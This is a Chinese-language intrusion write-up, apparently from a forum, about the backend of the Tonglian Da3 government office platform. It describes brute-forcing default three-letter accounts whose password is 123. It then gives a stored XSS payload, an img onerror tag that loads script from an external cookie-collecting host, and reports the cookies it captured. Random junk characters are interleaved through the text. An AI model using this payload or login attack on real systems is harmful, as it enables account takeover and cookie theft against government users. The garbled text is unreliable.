, ?( s- l. \- I, I
& V: c4 b/ }& l' ?4 g B$ R; w 同联Da3协同办公平台后台通用储存型xss漏洞3 N5 Q1 p4 S: J" ~3 H
5 E7 t* T, t( a N# a# Y
# E% n4 y$ A! E8 h5 r 平台简介:6 d( W0 }9 i; e: H9 p
: X: f& [# r9 z4 S& o: t
) Y4 v% m4 ]0 R) d+ ~1 C0 b 8 h8 O' }8 T8 ^2 m& `9 s
6 ~* f- r3 ?) \" ?" A* A2 U
9 ?4 V+ T% L% \9 g+ A0 {
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
! B- q. R# H7 r7 P5 `同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
* G1 m# ]. L3 W6 V9 h5 l8 v同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!! n6 c; I# F, f& r
7 x) Y2 Q) C( I2 Z3 T @4 ]0 z
9 L% S, f/ J p# l
D6 R9 i1 P" O0 X
, {7 K: S0 |4 R3 o$ | ' k0 \: m6 `$ g* b0 A2 S
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:; Q0 L+ V: d" m* Y/ @: s- ]/ q8 ]" i+ c
3 ]% E1 M1 M! G8 [
% B" D" R: |6 v2 G- C
# W8 P1 f8 N. @0 u8 V# b
- _ m( \* O; h" T# u" L
" h. W3 U3 _: f, }) C9 m9 _ http://1.1.1.1:7197/cap-aco/#(案例2-)
( T# D$ @) Z: o, `
8 c8 B+ G* X0 D o, q/ p3 R9 m7 q9 Y
+ i8 S/ W& j/ d) ?/ K http://www.XXOO.com (案例1-官网网站)
+ B/ D& Y* k) X3 o/ k: N' X
3 R' }; d) ]; R( |% J) Z
( d- {% P) ]8 n3 u 漏洞详情:; y! n9 x$ \3 ^5 n5 Q8 ^8 k# f
" C' T. P" n# |6 U 1 T" }( p5 x7 D3 p: ^( X8 G1 a" P
案例一、; U7 H0 d9 e& a3 K6 L$ b2 L
8 c# F0 H1 l/ Y/ p
& O. D4 z8 a5 _: ~; W; V7 X% C3 o 初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试$ |- n0 i, r2 D0 a6 e5 Z# ]
% D; e% U" y7 g" ~3 e# k
% ]% W3 K7 t' }* u$ I4 l
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:% v- w) l; q& V
1 p0 e/ q+ U! O q/ a, C% L: E
u3 X3 C( Y0 h- b
1 o9 H6 ?& z1 @9 Y
' q5 l2 l# ^, k% D9 C! S' B" y4 r" f # S$ @/ e) v' `( N
3 D2 R, u" o" S9 L
+ m( y9 t, s4 F6 k' P
, A7 \' W9 g" A: |+ E
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: ' B( F; B9 y9 ~. s4 d, v5 }; b
G* _! @1 a( t
0 P, v+ C. G( f / t, u x, H: m' V
3 @2 A% X6 T% A6 o
5 o" I, S6 Z1 _" o
* O, r- k, _& a, J5 J/ M
/ A6 z9 ^9 u; b6 ^ ! }- i3 O# f( {. Y" a( Q
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
- h2 Q( e# k. B
; G Y6 T) t9 g6 c* r & Q" _9 C u9 n+ ?6 }3 o9 ^
7 H- y [1 Q# [
( V4 X8 L- L0 d
9 N$ ^) W+ a- b3 n7 l <img src=x
' l0 J' L! E. j7 ?/ Z- ]onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
# K! r R# l1 w* A! U
, G: H; V6 e) I# J2 E
( J; G1 A4 H( x; e" M
! B/ _/ J: k5 G0 o, R$ t4 T' A
; ]/ F& M" g$ ?8 n. }8 H4 Z
! n; x$ o3 x- ]! |3 C 然后发送,接收cookie如图: . p; R/ i7 _7 ~2 F, Y) A) S% R
& ~6 U/ B6 ~$ W2 z
2 k2 Y2 p8 C% g+ T2 ?& j/ x
1 i- b* C0 V# d2 }0 m
V7 c5 ~* b i; M
+ B5 b6 A) |% `8 Y/ P& b9 b
, j) S( v, x C& R; j7 Y
0 s$ @1 M& G+ d" Y0 `) S
' ~ M0 G& X0 V; o
, ~/ B1 h+ a+ I" b+ y
) _% }5 T- ~; R* U; t I# F9 P 0 H. c1 c {( C7 C
5 I' T' X1 X# S0 F6 j3 m9 q& Q, v( I
: q9 ?* d- r# b$ `; T" j% r
/ d) @8 R/ s/ {1 k6 I+ I& z8 j
2 L5 M. H: e, p) K/ x
: I3 N+ U4 a# C7 Q , m$ U' t* h: ^8 P
e/ l% O4 x5 a, y
$ q p+ d3 [5 ~ p6 `/ { + g& D! n0 k; ?7 E
2 O$ j& v* m6 X7 D1 r( F5 \
$ F( N$ i% z6 K; a" i* r
2 o! Y, q5 b. X/ X# X 案例2、 7 E5 f1 @% [8 m8 }( I$ [1 f3 L6 q
6 f9 C+ B h; h: t* i
6 q% R; q1 B- e7 T V: g. d 前面步骤都一样,下面看效果图: 3 Z7 f$ v3 J) w6 O! z) ^
" M1 `. E* Y R
1 w& g5 V1 \3 n- [4 r. U; {
4 d" N3 ?9 d/ q; k! m
( b4 E/ h! |4 L5 K: x7 Y7 t7 V/ S
! I& e0 u- ^) d+ z$ Y" Z0 m b
, l. [6 R8 u8 E! U0 q
' |5 [2 ?# v( ?: z2 ?' s# n3 K
% L& @6 Y$ a: v, J$ \( w
K3 L1 o! [, g! D, E
7 t) i% n7 J {3 n2 I, P
& w0 l5 {8 b3 X
$ ?8 B* p2 a2 U! f+ Q2 E5 t2 c3 y
' Z. k$ U$ A, _% y T
5 k" ~7 u$ g9 @# W( N& x7 D# V& c3 p
) P7 U C) J+ j
; H/ _7 R6 S. p) c# a3 r8 \
. Q2 f* L6 @1 ]/ @7 P; h z) ]/ S 0 E8 c# p! n) q0 k
0 V" r$ P; z6 w
' z8 q# O( _' K5 Z& l" l9 F- j - C9 x; S; T; E
3 k1 \( j' s9 J. x1 q
4 P0 w" x/ j) R( x , d# o: b$ g& A: l/ ?7 d1 o0 q
, W# D7 P3 A+ ~! o# `0 q+ d7 E M/ c9 W4 |2 q' ^- Y
: s% G% U9 R) L9 D7 `
! @% E5 S5 T; C; O